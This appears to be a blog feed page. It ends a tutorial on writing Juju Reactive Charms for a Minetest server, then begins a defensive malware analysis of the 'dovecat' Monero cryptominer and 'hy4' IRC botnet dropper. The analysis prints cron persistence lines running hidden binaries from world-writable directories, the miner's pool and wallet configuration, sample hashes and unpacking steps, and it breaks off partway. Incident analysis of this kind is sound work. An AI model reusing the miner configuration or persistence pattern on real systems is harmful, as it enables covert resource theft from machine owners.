<span class="p">})</span>
<span class="c1"># Restart the minetest service to take on new config
</span> <span class="n">service_restart</span><span class="p">(</span><span class="s">'minetest.service'</span><span class="p">)</span>
<span class="c1"># Tell Juju that minetest is good to go
</span> <span class="n">status_set</span><span class="p">(</span><span class="s">'active'</span><span class="p">,</span> <span class="s">'Configuration file written'</span><span class="p">)</span>
<span class="o">@</span><span class="n">when</span><span class="p">(</span><span class="s">'db.database.available'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">database_connected</span><span class="p">():</span>
<span class="c1"># We have a database now, so we can generate config anytime now
</span> <span class="n">set_flag</span><span class="p">(</span><span class="s">'minetest.database.confgured'</span><span class="p">)</span>
<span class="c1"># Generate the config file with database credentials
</span> <span class="n">minetest_regenerate_configuration</span><span class="p">()</span>
<span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'db.connected'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">missing_database</span><span class="p">():</span>
<span class="n">status_set</span><span class="p">(</span><span class="s">'blocked'</span><span class="p">,</span> <span class="s">'Relation to postgresql required'</span><span class="p">)</span>
</code></pre></div></div>
<p>We first import all the functions we need from the <code class="language-plaintext highlighter-rouge">charmhelpers</code> python module,
which is actually quite a lot for our small piece of code, but it’s okay, since
we want charmhelpers to do our heavy lifting.</p>
<p>We next have a function <code class="language-plaintext highlighter-rouge">install_minetest_server()</code>, that acts as a singleton
like I described when I mentioned how flags work. It has an extra condition
though, and that is <code class="language-plaintext highlighter-rouge">@when('apt.installed.minetest')</code>. This ensures that
we only call <code class="language-plaintext highlighter-rouge">install_minetest_server()</code> once the <code class="language-plaintext highlighter-rouge">apt</code> layer has completed
installing the <code class="language-plaintext highlighter-rouge">minetest</code> package.</p>
<p>In <code class="language-plaintext highlighter-rouge">install_minetest_server()</code>, we set up the <code class="language-plaintext highlighter-rouge">minetest</code> user and group, set up
a <code class="language-plaintext highlighter-rouge">/home</code> directory and world directory, and install a systemd service file. We
also get the minetest package version and expose it to Juju for pretty
<code class="language-plaintext highlighter-rouge">juju status</code> prompts with our actual minetest version.</p>
<p>Next up we have <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code> which collects the
Charms config parameters, and database relation parameters, and renders the
variables into the template config file we created above. Smart right? I thought
so. We also restart the systemd service to load the new configuration, and set
the Charm’s status to <code class="language-plaintext highlighter-rouge">active</code>.</p>
<p>We used two flags for <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code>, which makes sure we
only call the function when both <code class="language-plaintext highlighter-rouge">config.changed</code> and <code class="language-plaintext highlighter-rouge">minetest.database.confgured</code>
is set. <code class="language-plaintext highlighter-rouge">config.changed</code> acts like a hook in reality, and <code class="language-plaintext highlighter-rouge">minetest.database.confgured</code>
is what actually stops the function from being run before a database is available.</p>
<p>To pull this off, we have two functions, <code class="language-plaintext highlighter-rouge">missing_database()</code> and
<code class="language-plaintext highlighter-rouge">database_connected()</code>. <code class="language-plaintext highlighter-rouge">missing_database()</code> sets the Charms status to <code class="language-plaintext highlighter-rouge">blocked</code>
when there isn’t a postgresql relation present, which is what we want, since
without a backing database, we can’t play minetest.</p>
<p><code class="language-plaintext highlighter-rouge">database_connected()</code> is called when we have a postgresql relation, and the
database is created and we have user credientals available. This is from the
<code class="language-plaintext highlighter-rouge">db.database.available</code> flag that the postgresql interface sets. We take the
opportunity to set ‘minetest.database.confgured’ so we can go ahead and render
our configuration, and then manually call <code class="language-plaintext highlighter-rouge">minetest_regenerate_configuration()</code>
to make that happen.</p>
<p>Its not too complicated, and it actually turned out to be less code than the old
hook based Charm.</p>
<h1 id="deploying-the-charm">Deploying the Charm</h1>
<p>Now that everything is in place, let’s go ahead and deploy the Charm to our
machines, and get our minetest server running.</p>
<h2 id="creating-the-controller">Creating the Controller</h2>
<p>We will be using LXD as the cloud backend for our Juju model today, so go ahead
and deploy a juju controller with the “localhost” backend:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju bootstrap <span class="nt">--bootstrap-series</span><span class="o">=</span>hirsute localhost lxd-controller
Creating Juju controller <span class="s2">"lxd-controller"</span> on localhost/localhost
Looking <span class="k">for </span>packaged Juju agent version 2.9.12 <span class="k">for </span>amd64
Located Juju agent version 2.9.12-ubuntu-amd64 at https://streams.canonical.com/juju/tools/agent/2.9.12/juju-2.9.12-ubuntu-amd64.tgz
To configure your system to better support LXD containers, please see: https://github.com/lxc/lxd/blob/master/doc/production-setup.md
Launching controller instance<span class="o">(</span>s<span class="o">)</span> on localhost/localhost...
- juju-6b05e2-0 <span class="o">(</span><span class="nb">arch</span><span class="o">=</span>amd64<span class="o">)</span>
Installing Juju agent on bootstrap instance
Fetching Juju Dashboard 0.8.1
Waiting <span class="k">for </span>address
Attempting to connect to 10.29.181.61:22
Connected to 10.29.181.61
Running machine configuration script...
Host key fingerprint is SHA256:H0KFu2A5tmmM2blQ5dJ70iMhav+6RJ+4wKrkTp08y2M
+---[RSA 2048]----+
| .. |
| o. |
| <span class="o">=</span>.. |
| X.<span class="o">=</span> |
| X.OS<span class="o">=</span><span class="nb">.</span> |
| o.B.Bo<span class="o">=</span>++. |
| o <span class="k">*</span>o+o.o+.. |
|+ .Eooo. |
|o+oo. ++. |
+----[SHA256]-----+
Bootstrap agent now started
Contacting Juju controller at 10.29.181.61 to verify accessibility...
Bootstrap <span class="nb">complete</span>, controller <span class="s2">"lxd-controller"</span> is now available
Controller machines are <span class="k">in </span>the <span class="s2">"controller"</span> model
Initial model <span class="s2">"default"</span> added
</code></pre></div></div>
<p>Note, I used <code class="language-plaintext highlighter-rouge">--bootstrap-series=hirsute</code> to use Hirsute as the operating system
for the controller.</p>
<p>We can confirm our controller deployed properly with <code class="language-plaintext highlighter-rouge">juju controllers</code>:</p>
<p><img src="/assets/images/2021_004.png" alt="juju controller" /></p>
<p>Looking at <code class="language-plaintext highlighter-rouge">juju status</code> we now have a nice empty model:</p>
<p><img src="/assets/images/2021_005.png" alt="juju status" /></p>
<h2 id="deploying-the-postgresql-charm">Deploying the PostgreSQL Charm</h2>
<p>Our Minetest Charm depends on postgresql as a database backend to store our
player information and world data, so let’s go ahead and deploy it first.</p>
<p>Things have changed slightly from the last time I wrote a blog post, with
Charms now being able to be found on <a href="https://charmhub.io/">Charmhub</a>, instead
of the Charm Store.</p>
<p>So, we go to Charmhub, and search for postgresql, and come across the entry
<a href="https://charmhub.io/postgresql">postgresql at revision 235</a>.</p>
<p>Deploying it is simple, we just run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju deploy postgresql
Located charm <span class="s2">"postgresql"</span> <span class="k">in </span>charm-hub, revision 235
Deploying <span class="s2">"postgresql"</span> from charm-hub charm <span class="s2">"postgresql"</span>, revision 235 <span class="k">in </span>channel stable
</code></pre></div></div>
<p>and we can watch <code class="language-plaintext highlighter-rouge">juju status</code> while we wait.</p>
<p><img src="/assets/images/2021_006.png" alt="juju status" /></p>
<p>Eventually it will complete, and postgresql will be ready to use:</p>
<p><img src="/assets/images/2021_007.png" alt="juju status" /></p>
<h2 id="proofing-and-building-our-minetest-charm">Proofing and Building our Minetest Charm</h2>
<p>We can do a quick sanity check over our charm with <code class="language-plaintext highlighter-rouge">charm proof</code>, which tells us
if we are missing anything critical, or need to change some boilerplate code.</p>
<p><img src="/assets/images/2021_008.png" alt="charm proof" /></p>
<p>In our case, we are missing some hooks, which we will add later.</p>
<p>If everything looks okay, go ahead and build your charm with <code class="language-plaintext highlighter-rouge">charm build</code>:</p>
<p><img src="/assets/images/2021_009.png" alt="charm build" /></p>
<p>All green, fantastic! Time to deploy.</p>
<h2 id="deploying-our-minetest-charm">Deploying our Minetest Charm</h2>
<p>Our Charm was built and placed into <code class="language-plaintext highlighter-rouge">/tmp/charm-builds/minetest-server</code>, so
point Juju at that location, and deploy away:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju deploy /tmp/charm-builds/minetest-server
Located <span class="nb">local </span>charm <span class="s2">"minetest-server"</span>, revision 0
Deploying <span class="s2">"minetest-server"</span> from <span class="nb">local </span>charm <span class="s2">"minetest-server"</span>, revision 0
</code></pre></div></div>
<p>We can watch <code class="language-plaintext highlighter-rouge">juju status</code> like normal to see how it went:</p>
<p><img src="/assets/images/2021_010.png" alt="juju status" /></p>
<p>Ouch. Error in the install hook. Not a problem, Juju can tell us what went
wrong in an instant, with the <code class="language-plaintext highlighter-rouge">juju debug-log</code> command. Run that, and let’s see
what went wrong:</p>
<p><img src="/assets/images/2021_011.png" alt="juju debug-log" /></p>
<p>Silly me, seems I forgot to include a logger module, not to worry, we can
fix that right up. Add the following to minetest-server.py at the top:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">charmhelpers.core.hookenv</span> <span class="kn">import</span> <span class="n">log</span><span class="p">,</span> <span class="n">status_set</span>
</code></pre></div></div>
<p>and we should be good to go. But if you happen to have a different problem,
don’t forget you can <code class="language-plaintext highlighter-rouge">juju ssh minetest-server/0</code> to get a shell inside the
minetest LXD container, where you can debug from there.</p>
<p><img src="/assets/images/2021_013.png" alt="juju ssh" /></p>
<p>The charm itself lives in <code class="language-plaintext highlighter-rouge">/var/lib/juju/agents/unit-minetest-server-0/charm/</code>,
so <code class="language-plaintext highlighter-rouge">cd</code> into there, edit <code class="language-plaintext highlighter-rouge">minetest-server.py</code> in <code class="language-plaintext highlighter-rouge">vim</code>, save and exit.</p>
<p><img src="/assets/images/2021_014.png" alt="juju location" /></p>
<p>We don’t have to redeploy the entire Charm to get small bugfixes, and production
servers you might not have that luxury at all. Instead, we can run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju resolved minetest-server/0
</code></pre></div></div>
<p>and this tells Juju that we fixed the errors, and to re-try that hook again. If
we check <code class="language-plaintext highlighter-rouge">juju status</code>, it seems to have worked:</p>
<p><img src="/assets/images/2021_012.png" alt="juju status" /></p>
<p>We are now waiting on our database connection, so let’s make the relation happen:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju relate postgresql:db minetest-server:db
</code></pre></div></div>
<p>Checking <code class="language-plaintext highlighter-rouge">juju status</code> now, we see all green, and that our configuration file
has been written correctly:</p>
<p><img src="/assets/images/2021_015.png" alt="juju status" /></p>
<p>This is promising! Let’s expose the port:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju expose minetest-server
</code></pre></div></div>
<p>Open up minetest, and connect to the server listed at <code class="language-plaintext highlighter-rouge">private-address</code> in
<code class="language-plaintext highlighter-rouge">juju status</code>, which is <code class="language-plaintext highlighter-rouge">10.29.181.198</code> in my case, on port <code class="language-plaintext highlighter-rouge">30000</code>, which we
set in our configuration:</p>
<p><img src="/assets/images/2021_016.png" alt="minetest connect" /></p>
<p>And click connect, and wow it works! We find ourselves in a snowy world, all
powered by Minetest + Postgresql + Juju with Reactive Charms. Very fancy, and
production ready.</p>
<p><img src="/assets/images/2021_017.png" alt="minetest working" /></p>
<h1 id="debugging-the-charm">Debugging the Charm</h1>
<p>Now that we have written our Reactive Charm, we also need to be able to debug it
and know what to do when things go wrong. These tips should help.</p>
<h2 id="getting-debug-logs">Getting Debug Logs</h2>
<p>As mentioned when we were writing the Reactive code, your first port of call
when you run into a problem is to run <code class="language-plaintext highlighter-rouge">juju debug-log</code>. This gives you the log
outputs of all active running Charms, and any error messages like stack traces
are very prominent and repeated often, so you won’t miss anything.</p>
<p><img src="/assets/images/2021_019.png" alt="juju debug-log" /></p>
<p>Make sure to make use of <code class="language-plaintext highlighter-rouge">log()</code> from <code class="language-plaintext highlighter-rouge">charmhelpers.core.hookenv</code>, and use it
to write useful information to the Juju log, as well to print debug information
like a <code class="language-plaintext highlighter-rouge">print</code> statement or <code class="language-plaintext highlighter-rouge">printk</code>. I did this a lot when writing this charm,
so I could see the contents of <code class="language-plaintext highlighter-rouge">relations_of_type()</code> with Python’s <code class="language-plaintext highlighter-rouge">dir()</code>.</p>
<p>It’s also very helpful to have <code class="language-plaintext highlighter-rouge">juju debug-log</code> running in a window on a second
screen so you can keep a detailed watch of deployment progress when you are
developing your charm.</p>
<h2 id="debugging-hooks-and-examining-flags-at-runtime">Debugging Hooks and Examining Flags at Runtime</h2>
<p>In the previous article, we used <code class="language-plaintext highlighter-rouge">juju debug-hooks application-name/unit</code> to
access a <code class="language-plaintext highlighter-rouge">tmux</code> session to see what data is exchanged during various hooks like
<code class="language-plaintext highlighter-rouge">db-relation-joined</code> and <code class="language-plaintext highlighter-rouge">config-changed</code>.</p>
<p>We can still do all of that, but <code class="language-plaintext highlighter-rouge">juju debug-hooks</code> has gotten more powerful
for Reactive Charms.</p>
<p>If you run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju debug-hooks minetest-server/5
</code></pre></div></div>
<p>You get the same <code class="language-plaintext highlighter-rouge">tmux</code> session:</p>
<p><img src="/assets/images/2021_020.png" alt="juju debug-hooks" /></p>
<p>Now, we can run hooks manually by executing the python scripts that are
backing them, in the <code class="language-plaintext highlighter-rouge">hooks</code> directory of the Charm.</p>
<p>The session is opened to the Charm directory, at
<code class="language-plaintext highlighter-rouge">var/lib/juju/agents/unit-minetest-server-5/charm</code>, so we can <code class="language-plaintext highlighter-rouge">ls hooks/</code>
to see what we can run:</p>
<p><img src="/assets/images/2021_021.png" alt="juju debug-hooks" /></p>
<p>If we wanted to run <code class="language-plaintext highlighter-rouge">config-changed</code> manually, we can do this with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 hooks/config-changed
</code></pre></div></div>
<p>and it runs. Very useful if you need to watch what is happening in
<code class="language-plaintext highlighter-rouge">juju debug-log</code> concurrently.</p>
<p>But what happens if your flags aren’t getting hit? No worries, we can see what
the values for the flags are by running:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>charms.reactive <span class="nt">-p</span> get_flags
</code></pre></div></div>
<p><img src="/assets/images/2021_022.png" alt="juju get-flags" /></p>
<p>Not only can we see what they are actually called (which is useful in itself,
I thought <code class="language-plaintext highlighter-rouge">db.available</code> was a flag, but it was actually called
<code class="language-plaintext highlighter-rouge">db.database.available</code> instead, and <code class="language-plaintext highlighter-rouge">get_flags()</code> told me this), but we can
also see if they are set or unset, with commands like <code class="language-plaintext highlighter-rouge">all_flags_set()</code>,
<code class="language-plaintext highlighter-rouge">get_unset_flags()</code>, <code class="language-plaintext highlighter-rouge">is_flag_set()</code>, and we can also change flags with
<code class="language-plaintext highlighter-rouge">set_flag()</code>, <code class="language-plaintext highlighter-rouge">clear_flag()</code>, <code class="language-plaintext highlighter-rouge">toggle_flag()</code>. Very useful.</p>
<h1 id="cleaning-up">Cleaning Up</h1>
<p>Once we have had our fun and want to reclaim some disk space back, we can tear
down and remove the deployment with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju remove-application minetest-server
removing application minetest-server
<span class="nv">$ </span>juju remove-application postgresql
removing application postgresql
</code></pre></div></div>
<p>You can check <code class="language-plaintext highlighter-rouge">juju status</code> to keep an eye on progress. If anything gets stuck
you can forcefully remove the machine number 5 with:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju remove-machine 5 <span class="nt">--force</span>
</code></pre></div></div>
<p>If you want to remove your controller, then run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>juju destroy-controller lxd-controller <span class="nt">--destroy-all-models</span>
WARNING! This <span class="nb">command </span>will destroy the <span class="s2">"lxd-controller"</span> controller.
This includes all machines, applications, data and other resources.
Continue? <span class="o">(</span>y/N<span class="o">)</span>:y
Destroying controller
Waiting <span class="k">for </span>hosted model resources to be reclaimed
Waiting <span class="k">for </span>1 model
All hosted models reclaimed, cleaning up controller machines
</code></pre></div></div>
<h1 id="conclusion">Conclusion</h1>
<p>In this article we revisited writing Juju Charms, this time taking the more
modern and robust Reactive Charms for a spin. We ported our simple Minetest
Charm to Reactive, which was quite straightforward, and managed to make our
code simpler than when had hook based Charms.</p>
<p>I enjoyed digging into all the new Charmhelper functionality and getting my
head around how flags work, and I hope it has been useful with helping you to
write your own Reactive Charms.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellIt has been a really long time since my last blog post, so let’s fix that by writing a followup post to my popular article on learning to write Juju Charms, where we wrote a simple Charm to deploy a production ready Minetest server, complete with postgresql integration through Juju relations. Today, we are going to go a step further and delve into Reactive Charms, where we can define and maintain state through flags. Flags let us have a memory of events that have happened in the past, and only run certain functions to “react” to changes in those flags. Reactive Charms are primarily written in Python, and there are a lot of different submodules that exist to help you develop your Charm. So buckle up, because we are going to take our little Minetest Charm to the next level.Analysis of the dovecat and hy4 Linux Malware2020-10-27T00:00:00+00:002020-10-27T00:00:00+00:00https://ruffell.nz/reverse-engineering/writeups/2020/10/27/analysis-of-the-dovecat-and-hy4-linux-malware<p>A few days ago, a case came in which had some rather odd symptoms, such as
processes using high amounts of CPU and memory, and running from the <code class="language-plaintext highlighter-rouge">/tmp</code>
directory.</p>
<p>After asking for some logs, and some samples of the binaries, it became obvious
that the system was compromised, and was now running some interesting malware.</p>
<p>In this post, we are going to look into the malware called <strong>dovecat</strong>, which
turned out to be a cryptominer, and <strong>hy4</strong>, which is a IRC botnet malware
dropper.</p>
<p><img src="/assets/images/2020_024.png" alt="hero" /></p>
<p>I’m pretty excited, as I haven’t analysed any Linux malware before, and this is
real life stuff pulled directly from a production machine, so it still has its
fangs intact.</p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="problem-description">Problem Description</h1>
<p>This case caught my eye as soon as I saw it in the queue. The description
mentions that a process called <strong>dovecat</strong> was using a large amount of CPU time
and most of the system’s memory, and was causing the machine to run slowly.</p>
<p>dovecat did not seem to match any service the system was running, and there
are files in the <code class="language-plaintext highlighter-rouge">/tmp</code> directory owned by the service which is running the
dovecat process. It all looked rather suspicious, and a case was filed.</p>
<p>Now, the description alone raises a bunch of red flags. Is the dovecat
executable itself in <code class="language-plaintext highlighter-rouge">/tmp</code>? Are the files in <code class="language-plaintext highlighter-rouge">/tmp</code> configuration, or more
malware? No legitimate programs place files in <code class="language-plaintext highlighter-rouge">/tmp</code> for anything other than
temporary storage. Malware only use <code class="language-plaintext highlighter-rouge">/tmp</code> since any user has the ability to
write there.</p>
<p>We needed more information, so we asked for a sosreport. The logs were
extremely interesting. The system itself is Ubuntu 18.04, but it is massively
out of date. It looks like it hasn’t been patched in 1 - 2 years. Here’s what
I found:</p>
<p>Firstly, looking at <code class="language-plaintext highlighter-rouge">ps aux</code>, we can see that dovecat is indeed running from
<code class="language-plaintext highlighter-rouge">/tmp</code>, as the system daemon user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon 100394 397 29.4 2894488 2402584 ? Sl 05:34 735:24 /tmp/dovecat
</code></pre></div></div>
<p>The kernel logs showed that dovecat was segfaulting occasionally:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kernel: [2394416.671219] dovecat[46657]: segfault at 63 ip 00007f2be096b448 sp 00007f2be2393490 error 4 in libnss_files-2.27.so[7f2be0968000+b000]
kernel: [2424348.437406] dovecat[53028]: segfault at 63 ip 00007f45e1b60448 sp 00007f45e3588490 error 4 in libnss_files-2.27.so[7f45e1b5d000+b000]
kernel: [2431562.775108] dovecat[54622]: segfault at 63 ip 00007feec3df1448 sp 00007feec9831490 error 4 in libnss_files-2.27.so[7feec3dee000+b000]
kernel: [2467413.285152] dovecat[62803]: segfault at 63 ip 00007f803f8be448 sp 00007f80412e6490 error 4 in libnss_files-2.27.so[7f803f8bb000+b000]
</code></pre></div></div>
<p>syslog also showed some strange an alarming cronjobs running with strange names:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CRON[105618]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105617]: (CRON) info (No MTA installed, discarding output)
CRON[105627]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105625]: (CRON) info (No MTA installed, discarding output)
CRON[105628]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105626]: (CRON) info (No MTA installed, discarding output)
CRON[105712]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
CRON[105753]: (daemon) CMD (/var/tmp/sh7 > /dev/null 2>&1 &^M)
CRON[105751]: (CRON) info (No MTA installed, discarding output)
CRON[105754]: (daemon) CMD (/dev/shm/bash7 > /dev/null 2>&1 &^M)
CRON[105758]: (daemon) CMD (/tmp/bash7 > /dev/null 2>&1 &^M)
CRON[105749]: (CRON) info (No MTA installed, discarding output)
CRON[105756]: (daemon) CMD (/var/lock/bash7 > /dev/null 2>&1 &^M)
CRON[105757]: (daemon) CMD (/tmp/init7 > /dev/null 2>&1 &^M)
CRON[105748]: (CRON) info (No MTA installed, discarding output)
CRON[105752]: (CRON) info (No MTA installed, discarding output)
CRON[105750]: (CRON) info (No MTA installed, discarding output)
</code></pre></div></div>
<p>Where do I even begin?</p>
<p>dovecat was indeed running directly from <code class="language-plaintext highlighter-rouge">/tmp</code> as <code class="language-plaintext highlighter-rouge">/tmp/dovecat</code>. The binary
itself segfaulting in <code class="language-plaintext highlighter-rouge">libnss_files-2.27.so</code> means that dovecat was either
poorly written, or that it was trying to link to a system library it was not
compiled for, or if it was statically linked, something went wrong in the
linker stage.</p>
<p>The cronjobs are particularly alarming, since there are multiple executables,
all located in world writable places, such as <code class="language-plaintext highlighter-rouge">/tmp</code>, <code class="language-plaintext highlighter-rouge">/var/lock</code>, <code class="language-plaintext highlighter-rouge">/var/tmp</code>
and <code class="language-plaintext highlighter-rouge">/dev/shm</code>, and all use the same discard to <code class="language-plaintext highlighter-rouge">/dev/null</code> string:
<code class="language-plaintext highlighter-rouge">> /dev/null 2>&1 &^M</code>. These executables are obviously wanting to hide their
output to evade detection, and are placed throughout the disk to gain redundant
persistence.</p>
<p>At this point, I asked for samples to be collected for the following files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/tmp/dovecat
/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/var/lock/bash7
/tmp/init7
</code></pre></div></div>
<p>They were collected and uploaded to the case, so let’s start doing some
in-depth analysis, shall we?</p>
<h1 id="basic-information-on-the-collected-samples">Basic Information on the Collected Samples</h1>
<p>If you are wanting to follow along at home, you can find the samples analysed
by searching for their SHA256 hash on Google or VirusTotal. I don’t really want
to host live malware on my blog, so I won’t offer the samples as a download.</p>
<p>Alright, lets have a look what we have here.</p>
<h2 id="dovecat">dovecat</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SHA256 10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08
$ file dovecat
dovecat: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5abe6768b29bdf70910880c44f79c991682b439f, stripped
</code></pre></div></div>
<p>Okay, nothing too surprising here. Statically linked executable built for 64 bit
Linux. Let’s check VirusTotal for the hash:</p>
<p><a href="https://www.virustotal.com/gui/file/10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08/detection">VirusTotal - dovecat</a></p>
<p>It seems we have a match, and only very recently too. Currently 29 / 61 virus
scanning engines detect the binary as a virus, and interestingly, it was first
submitted on 2020-10-09 23:23:39, meaning that this executable has been compiled
within the last month or so.</p>
<p><img src="/assets/images/2020_025.png" alt="virustotal - dovecat" /></p>
<p>The engines seem to class this as some sort of cryptocurrency miner, so we will
need to dig into this a bit further.</p>
<p><img src="/assets/images/2020_027.png" alt="Cutter" /></p>
<p>This is one big executable, at 7mb. We have 6416 functions, which is large,
although this is statically linked, so we need to include the various libraries
which have been linked into the base executable.</p>
<p>What is interesting is the compiler: <code class="language-plaintext highlighter-rouge">GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609</code>.
It seems the attacker compiled on Ubuntu 16.04, using the <a href="https://packages.ubuntu.com/xenial/gcc-5"><code class="language-plaintext highlighter-rouge">gcc-5</code> package</a>
at the latest version.</p>
<h2 id="bash7--init7--sh7">bash7 / init7 / sh7</h2>
<p>These files are interesting, as all the following samples that were collected:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/var/lock/bash7
/tmp/init7
</code></pre></div></div>
<p>they all have the same hash, and are the same executable. I did a quick check,
and it seems they are packed with UPX:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strings init7 | grep UPX
UPX!
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved.
</code></pre></div></div>
<p>I installed UPX, and found they unpack with no problems. The attacker seems to
be using a non-modified version of UPX.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ upx -d init7
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94 Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017
File size Ratio Format Name
-------------------- ------ ----------- -----------
73227 <- 36948 50.46% linux/i386 init7
Unpacked 1 file.
</code></pre></div></div>
<p>Alright, now the basic stats:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SHA256 f9c3165b9634b8f0ee139905b32e396ab10b30b74a05f4f705b18e841302555
SHA256 (unpacked) 22f1c7056beb9be8acf2ca5b4185ebe422b5566af7b36052b85d35686e38b456
$ file init7
init7: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
</code></pre></div></div>
<p>Not stripped? Now that’s interesting. Let’s check VirusTotal.</p>
<p><a href="https://www.virustotal.com/gui/file/22f1c7056beb9be8acf2ca5b4185ebe422b5566af7b36052b85d35686e38b456/detection">VirusTotal - hy4</a></p>
<p>Interesting again, only 6 / 61 virus engines detect this as malware. It seems
very new as well, with the first submission only being 4 days ago: 2020-10-22 08:40:27.</p>
<p><img src="/assets/images/2020_026.png" alt="Virustotal - init7" /></p>
<p>This malware has something to hide, thats for sure. We are going to need to look
deeper into this one as well.</p>
<p><img src="/assets/images/2020_034.png" alt="cutter" /></p>
<p>This binary is much smaller, at 72kb. There are still a lot of functions, 241
of them, but are mostly going to be library functions that have been statically
linked. The compiler is a bit more older, and doesn’t seem to be an Ubuntu
provided one.</p>
<h1 id="advanced-static-analysis">Advanced Static Analysis</h1>
<p>Time to have a look into these executables from an assembly language perspective,
and see if we can determine exactly what these binaries do.</p>
<p>Today I’ll be using radare2-cutter and Ghidra. Just the latest upstream version
from their respective websites.</p>
<h2 id="dovecat-1">dovecat</h2>
<p>The entrypoint to dovecat isn’t interesting, it seems to jump around and setup
various statically linked libraries. I skipped ahead to <code class="language-plaintext highlighter-rouge">main()</code>:</p>
<p><img src="/assets/images/2020_028.png" alt="main" /></p>
<p>We seem to check some magic numbers, and if the check fails, we exit, otherwise
we enter an infinite loop that calls three functions over and over.</p>
<p>Those three functions themselves aren’t interesting either. Looks like we will
have to go hunting for some strings and do some x-refs to see what is going on.</p>
<p>With 101933 strings to go through, this is going to be tough. We might have to
search. Since VirusTotal seems to think this is a cryptocurrency miner, let’s
try things like “bitcoin”, “coin”, “mine”.</p>
<p>“bitcoin” came up empty. “coin” wasn’t useful either. “mine” was very, very
useful, since it came up with this string:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"autosave": true,
"donate-level": 0,
"cpu": true,
"opencl": false,
"cuda": false,
"pools":
[
{
"url": "pool.minexmr.com:443",
"user": "46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ",
"rig-id": "w1",
"keepalive": true,
"tls": true
}
]
}
</code></pre></div></div>
<p>This seems to be some sort of configuration for this binary. It has CPU mining
enabled, but opencl and cuda disabled. Weird, normally you would want to take
advantage of a GPU if the system had one.</p>
<p>It also shows it is a member of the mining pool <code class="language-plaintext highlighter-rouge">pool.minexmr.com:443</code>,
and supplies a user hash <code class="language-plaintext highlighter-rouge">46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ</code>.</p>
<p>Let’s go to the mining pool website, and see if we can get some information
about the user hash we have here.</p>
<p><a href="https://beta.minexmr.com/dashboard?address=46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ">MineXMR Mining Dashboard</a></p>
<p>Well, well, well, what have we stumbled upon.</p>
<p><img src="/assets/images/2020_029.png" alt="Mine XMR" /></p>
<p>It seems this user hash is a wallet public key for the Monero cryptocurrency.
Monero is one of those privacy coins with a hidden ledger. You can’t see the
balance of a particular wallet. Kind of frustrating for detectives you know?</p>
<p>Anyway, it seems the attacker is pulling a hashrate of 161kh/s, over 3 “workers”.
